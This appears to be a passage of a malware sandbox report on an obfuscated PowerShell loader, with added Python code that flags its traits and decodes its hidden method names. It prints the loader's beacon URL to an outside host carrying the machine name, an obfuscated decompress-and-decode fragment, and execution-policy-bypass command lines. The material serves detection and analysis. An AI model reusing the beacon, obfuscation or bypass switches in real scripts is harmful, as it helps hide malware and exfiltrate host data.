nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){google.xjs={basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg',basecss:'/xjs/_/ss/k\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAAAAsAAAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJw/rs\x3dACT90oF1BL3ZlaLO9UErlKWVa-MwNL-zZw',basejs:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA',excm:[]};})();</script> <script nonce="aOoBqs0PzWzSw4eoMOAGxg">(function(){var u='/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,d';var st=1;var amd=1000;var mmd=0;var pod=true;
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: basejs:/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/dg\x3d0/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qAX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: u=/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/am\x3dAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAAAAwCAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d3/rs\x3dACT90oGMPIbLhEbfa9cuZNWYzrj6GUW7qA/m\x3dsb_he,dX
Source: powershell.exe, 00000000.00000002.1849552252.000001A1C2829000.00000004.00000800.00020000.00000000.sdmp  Binary or memory string: basecomb:'/xjs/_/js/k\x3dxjs.hp.en.slN0ICFlIdc.es5.O/ck\x3dxjs.hp.ZdvoAuacH0c.L.X.O/am\x3dBAAAAACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBAAAAAAAAAAAAAwCsAQAAIABAgAAAAAAAAAAAAAAAIAIAUAAQJwAAAOI7AgABsAgAAC8/d\x3d1/ed\x3d1/dg\x3d0/ujg\x3d1/rs\x3dACT90oE_rtqVigwL0ao_oPopZIJptrYpfg'
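The Sigma hits (powershell.exe started with -ExecutionPolicy unrestricted against a script on the user's Desktop) and the network observations above (a GET / to www.google.com, then a GET to cmacnnkfbhlcncm.top/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527, both carrying the User-Agent Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 that Invoke-WebRequest sends by default on Windows PowerShell 5.1) are the traits an analyst would turn into detections. The memory string http://$iba40z739y1rlcp/$nfe6owql0ibuxm9.php?id=$env:computername&key=$rsbjcivwtqdkf&s=527 shows the beacon is templated: random host and path, hostname as id, a numeric key and a fixed s=527. The Python below is an added example, not part of the Joe Sandbox report and not the Sigma rules it cites; it runs simplified versions of those checks over constructed process-creation and HTTP records. The first process record and the first two HTTP requests mirror the report, the remaining records are made-up benign controls, and the regexes approximate rather than reproduce the published Sigma logic.

```python
"""Triage checks for the traits this report attributes to download.ps1.
Added example; not Joe Sandbox code and not the Sigma rules it cites."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample records. The first process event and the first two HTTP
# requests mirror what the report observed; the rest are benign controls.
PROCESS_EVENTS = [
    {"ProcessId": 6884,
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'-noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"'},
    {"ProcessId": 7100,   # hypothetical benign control
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                    r'-NoProfile -File "C:\ProgramData\Scripts\inventory.ps1"'},
]
PS_UA = "Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682"
HTTP_REQUESTS = [
    {"host": "cmacnnkfbhlcncm.top",
     "url": "/jrmyitwlvqhtr.php?id=user-PC&key=69811902417&s=527", "user_agent": PS_UA},
    {"host": "www.google.com", "url": "/", "user_agent": PS_UA},
    {"host": "www.google.com", "url": "/",   # hypothetical browser traffic
     "user_agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/120.0.0.0 Safari/537.36"},
]

# -ExecutionPolicy accepts unambiguous prefixes (-ex, -exec, -ep). This is an
# approximation of the Sigma rule's intent, not its published logic.
EXEC_POLICY_RE = re.compile(r"-(?:executionpolicy|exec|ex|ep)\s+(?:unrestricted|bypass)\b", re.I)
SCRIPT_ARG_RE = re.compile(r'-file\s+"?([^"\s]+)', re.I)
USER_PROFILE_RE = re.compile(r"^[a-z]:\\users\\[^\\]+\\(?:desktop|downloads|appdata)\\", re.I)
PS_UA_RE = re.compile(r"WindowsPowerShell/\d")              # default Invoke-WebRequest UA on PS 5.1
BEACON_PATH_RE = re.compile(r"^/[a-z0-9]{8,}\.php$", re.I)  # random-word .php endpoint, as observed


def analyze_process(event):
    """Return finding tags for one process-creation record."""
    findings = []
    cmd = event["CommandLine"]
    if EXEC_POLICY_RE.search(cmd):
        findings.append("powershell-insecure-executionpolicy")
    m = SCRIPT_ARG_RE.search(cmd)
    if m and USER_PROFILE_RE.match(m.group(1)):
        findings.append("powershell-script-from-user-profile")
    return findings


def analyze_http(req):
    """Return finding tags for one HTTP request record."""
    findings = []
    from_powershell = bool(PS_UA_RE.search(req["user_agent"]))
    parts = urlsplit(req["url"])
    query = parse_qs(parts.query)
    # Connectivity probe: the script fetched google.com's front page before beaconing.
    if from_powershell and req["host"].endswith("google.com") and parts.path == "/":
        findings.append("powershell-connectivity-check")
    # Beacon shape: <random>.php?id=<host>&key=<digits>&s=<digits>, matching the
    # template recovered from memory (id=$env:computername, s=527).
    if (BEACON_PATH_RE.match(parts.path)
            and query.get("id")
            and query.get("key", [""])[0].isdigit()
            and query.get("s", [""])[0].isdigit()):
        findings.append("beacon-shape-id-key-s")
        if from_powershell:
            findings.append("beacon-from-powershell")
    return findings


def triage(process_events, http_requests):
    """Findings per record, in input order; an empty list means no hit."""
    return {"process": [analyze_process(e) for e in process_events],
            "http": [analyze_http(r) for r in http_requests]}


if __name__ == "__main__":
    result = triage(PROCESS_EVENTS, HTTP_REQUESTS)
    for event, hits in zip(PROCESS_EVENTS, result["process"]):
        print(f"process {event['ProcessId']}: {hits or 'no findings'}")
    for req, hits in zip(HTTP_REQUESTS, result["http"]):
        print(f"http {req['host']}{req['url']}: {hits or 'no findings'}")
```

The beacon-shape check is deliberately independent of the domain and path, since the template string shows both are generated per build; what stays constant is the parameter layout and the PowerShell User-Agent, so those are the durable hooks, and a Chrome request to the same host produces no finding.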
Source: classification engine | Classification label: mal76.evad.winPS1@2/7@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6932:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j1jzh334.mw5.ps1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: [IO.Compression.CompressionMode]::Decompress)) $g3v0touqxl2f4wy.((-join (@((3232-3165),(45954/414),(1488-(7936768/(5602+166))),(592-(6765-(7114-820))),(8864-8780),(4832-4721))| ForEach-Object { [char]$_ })))( $gpo5ezai6d24hv7 ) $g3v0touqxl2f4wy.((-join (@((1496-1429),(5486-(-4828+(3335+6871))),(631-(5138120/9881)),(979915/(67954975/(2106+(13767-(11751-(8590-4737)))))),(597920/(4919+(-4981+(11062-(35905440/(5633196/(7669-(6693328/974)))))))))| ForEach-Object { [char]$_ })))()$6drif729juxecgq.(([char[]]@((164351/2453),(929016/8602),(5528-(12984-(908040/120))),(1070880/(67167456/7213)),(666-(4949-4384))) -join ''))()[byte[]] $o73bgwy04a2hprd = $gpo5ezai6d24hv7.(([system.String]::new(@((-3378+3462),(4009-3898),(-2202+(-7098+9365)),(393870/(10997-(13115538/1739))),(2459-(-1128+(7365-(31669204/8137)))),(3614-(12823-9306)),(-2588+2709)))))() $74wcu51lgv832dk=$o73bgwy04a2hprd return $74wcu51lgv832dk}[System.Text.Encoding]::ascii.(([system.String]::new(@((-8460+(11638-3107)),(-9789+9890),(294-178),(3119-3036),(4845-4729),(-5591+(13577-7872)),(56280/536),(9713-(19126-(7189+2334))),(742733/(10673-3462))))))((e8ldxb2uzitpq7hg3jkawmo496n "…
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: download.ps1 | Virustotal: Detection: 13%
Source: unknown | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: slc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: linkinfo.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntshrui.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cscapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (2 identical events)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: napinsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshbth.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: nlaapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winrnr.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb1-F424491E3931}\InprocServer32 source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1848585404.000001A1BE872000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D5C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: ement.Automation.pdb source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\mscorlib.pdbX source: powershell.exe, 00000000.00000002.1896922208.000001A1D8CCD000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1896922208.000001A1D8C89000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: Microsoft.PowerShell.Commands.Utility.pdb source: powershell.exe, 00000000.00000002.1892984995.000001A1D89A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb3 source: powershell.exe, 00000000.00000002.1896922208.000001A1D8D07000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: lib.pdbpdblib.pdb: source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: scorlib.pdbZ source: powershell.exe, 00000000.00000002.1898776087.000001A1D8D6A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: *on.pdb source: powershell.exe, 00000000.00000002.1896530930.000001A1D8BCF000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B79D2A5 pushad ; iretd | 0_2_00007FFD9B79D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B8B6B10 push eax; ret | 0_2_00007FFD9B8B6B19
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B98CF0B push edx; ret | 0_2_00007FFD9B98CF0C
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B9879FC push ds; ret | 0_2_00007FFD9B9879FF
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9B9879BA push ecx; ret | 0_2_00007FFD9B9879CC
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB6622A push es; ret | 0_2_00007FFD9BB6624A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB6AC2C push ecx; ret | 0_2_00007FFD9BB6AD9A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB6AE33 push eax; ret | 0_2_00007FFD9BB6AE5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB66FE2 push esp; ret | 0_2_00007FFD9BB66FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB679C6 push esp; ret | 0_2_00007FFD9BB679C9
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB647C5 push ds; ret | 0_2_00007FFD9BB64C2A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB69D9C push ebx; ret | 0_2_00007FFD9BB69EBA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB686B3 push esp; ret | 0_2_00007FFD9BB686DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB6A2C0 push edx; ret | 0_2_00007FFD9BB6A2DA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB6B869 push ecx; ret | 0_2_00007FFD9BB6B86A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB66873 push ebp; ret | 0_2_00007FFD9BB6689A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB66873 push esp; ret | 0_2_00007FFD9BB66AC2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB66E7C push esp; ret | 0_2_00007FFD9BB66FDA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Code function: 0_2_00007FFD9BB66E78 push esp; ret | 0_2_00007FFD9BB66E7A
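
The Anti Malware Scan Interface row above shows the loader's string hiding: every .NET method it invokes is written as an `@( ... )` array of integer arithmetic that PowerShell casts to `[char]` at run time, so the names `CopyTo`, `Close`, `ToArray` and `GetString` never appear literally in download.ps1. The Python below is an added example, not part of this report or of the sample; it evaluates those arithmetic arrays statically (with the `ast` module, never `eval`) and recovers the method names from the exact fragment captured above, which is embedded as a constructed string. Read together with the `[IO.Compression.CompressionMode]::Decompress` at the start of the capture, the recovered sequence is the familiar decompress-into-MemoryStream-then-ASCII-decode stage of a PowerShell loader.

```python
import ast
import operator
from fractions import Fraction

# Constructed sample: the fragment of the script body that the report's AMSI row shows.
# Every method name is an @( ... ) array of integer arithmetic that PowerShell casts to
# [char] at run time. The report cuts the final string argument off, so it ends here too.
AMSI_FRAGMENT = r"""$g3v0touqxl2f4wy.((-join (@((3232-3165),(45954/414),(1488-(7936768/(5602+166))),(592-(6765-(7114-820))),(8864-8780),(4832-4721))| ForEach-Object { [char]$_ })))( $gpo5ezai6d24hv7 ) $g3v0touqxl2f4wy.((-join (@((1496-1429),(5486-(-4828+(3335+6871))),(631-(5138120/9881)),(979915/(67954975/(2106+(13767-(11751-(8590-4737)))))),(597920/(4919+(-4981+(11062-(35905440/(5633196/(7669-(6693328/974)))))))))| ForEach-Object { [char]$_ })))()$6drif729juxecgq.(([char[]]@((164351/2453),(929016/8602),(5528-(12984-(908040/120))),(1070880/(67167456/7213)),(666-(4949-4384))) -join ''))()[byte[]] $o73bgwy04a2hprd = $gpo5ezai6d24hv7.(([system.String]::new(@((-3378+3462),(4009-3898),(-2202+(-7098+9365)),(393870/(10997-(13115538/1739))),(2459-(-1128+(7365-(31669204/8137)))),(3614-(12823-9306)),(-2588+2709)))))() $74wcu51lgv832dk=$o73bgwy04a2hprd return $74wcu51lgv832dk}[System.Text.Encoding]::ascii.(([system.String]::new(@((-8460+(11638-3107)),(-9789+9890),(294-178),(3119-3036),(4845-4729),(-5591+(13577-7872)),(56280/536),(9713-(19126-(7189+2334))),(742733/(10673-3462))))))"""

_BINOPS = {ast.Add: operator.add, ast.Sub: operator.sub,
           ast.Mult: operator.mul, ast.Div: operator.truediv}
_UNOPS = {ast.USub: operator.neg, ast.UAdd: operator.pos}


def eval_int_expr(expr: str) -> int:
    """Evaluate + - * / over numeric literals using the Python AST instead of eval().

    Division is exact (Fraction); the final round() reproduces PowerShell's [char] cast,
    which rounds a non-integral double to the nearest even integer.
    """
    def walk(node):
        if isinstance(node, ast.Expression):
            return walk(node.body)
        if isinstance(node, ast.Constant) and type(node.value) in (int, float):
            return Fraction(node.value)
        if isinstance(node, ast.BinOp) and type(node.op) in _BINOPS:
            return _BINOPS[type(node.op)](walk(node.left), walk(node.right))
        if isinstance(node, ast.UnaryOp) and type(node.op) in _UNOPS:
            return _UNOPS[type(node.op)](walk(node.operand))
        raise ValueError("not a plain arithmetic expression")
    return int(round(walk(ast.parse(expr.strip(), mode="eval"))))


def array_literals(script: str):
    """Yield the body of every PowerShell @( ... ) array literal, honouring nested parentheses."""
    pos = 0
    while (start := script.find("@(", pos)) != -1:
        depth, end = 0, start + 1
        while end < len(script):
            depth += (script[end] == "(") - (script[end] == ")")
            if depth == 0:
                break
            end += 1
        yield script[start + 2:end]
        pos = end + 1


def split_top_level(body: str) -> list:
    """Split an array body on the commas that are not inside parentheses."""
    parts, depth, current = [], 0, []
    for ch in body:
        if ch == "," and depth == 0:
            parts.append("".join(current))
            current = []
            continue
        depth += (ch == "(") - (ch == ")")
        current.append(ch)
    parts.append("".join(current))
    return [p.strip() for p in parts if p.strip()]


def recover_strings(script: str) -> list:
    """Return every string the script assembles from an array of arithmetic character codes."""
    found = []
    for body in array_literals(script):
        try:
            codes = [eval_int_expr(item) for item in split_top_level(body)]
        except (ValueError, SyntaxError, ZeroDivisionError):
            continue  # some other array literal, not a character-code list
        if codes and all(32 <= c < 127 for c in codes):
            found.append("".join(chr(c) for c in codes))
    return found


if __name__ == "__main__":
    for name in recover_strings(AMSI_FRAGMENT):
        print(name)
```

The same `@(` scanner covers all three spellings the fragment uses (`-join (@(...) | ForEach-Object { [char]$_ })`, `[char[]]@(...) -join ''` and `[string]::new(@(...))`) because each builds its array the same way; only printable ASCII results are kept, so numeric arrays that are not strings fall out on their own.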
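
The Process created row above records `-ExecutionPolicy unrestricted -file ...`, the switch that tripped the Sigma rule listed in the summary (Change PowerShell Policies to an Insecure Level). The check below is an added example and not that Sigma rule or any code from the report: given the CommandLine field of a process-creation event (Sysmon event 1 or Security 4688), it resolves powershell.exe's parameter prefixes and documented aliases (`-ep`, `-ex`, `-exec` for `-ExecutionPolicy`; `-e`, `-ec`, `-enc` for `-EncodedCommand`; `-w` for `-WindowStyle`), which is why a substring match on the full word `-ExecutionPolicy` misses most real intrusions. The first sample command line is the one from this report; the other two are constructed for contrast.

```python
import shlex
from typing import Optional

# Constructed sample events. The first command line is the one the report records for
# PID 6884; the other two are made up for contrast.
SAMPLE_CMDLINES = [
    r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\download.ps1"',
    r'powershell.exe -NoProfile -Command "Get-Date"',
    r'powershell -ep bypass -w hidden -enc SQBFAFgA',
]

# Policies that disable script-signing checks outright.
INSECURE_POLICIES = {"bypass", "unrestricted"}


def _param_name(token: str) -> Optional[str]:
    """Lower-cased parameter name for a token like -ExecutionPolicy or /ep, else None."""
    if len(token) > 1 and token[0] in "-/" and token[1].isalpha():
        return token[1:].lower()
    return None


def _is_param(name: str, full: str, aliases: tuple) -> bool:
    """powershell.exe accepts any unambiguous prefix of a parameter name plus its documented aliases."""
    return name in aliases or (len(name) >= 2 and full.startswith(name))


def assess_powershell_cmdline(cmdline: str) -> dict:
    """Summarise the evasion-relevant switches of a powershell.exe command line."""
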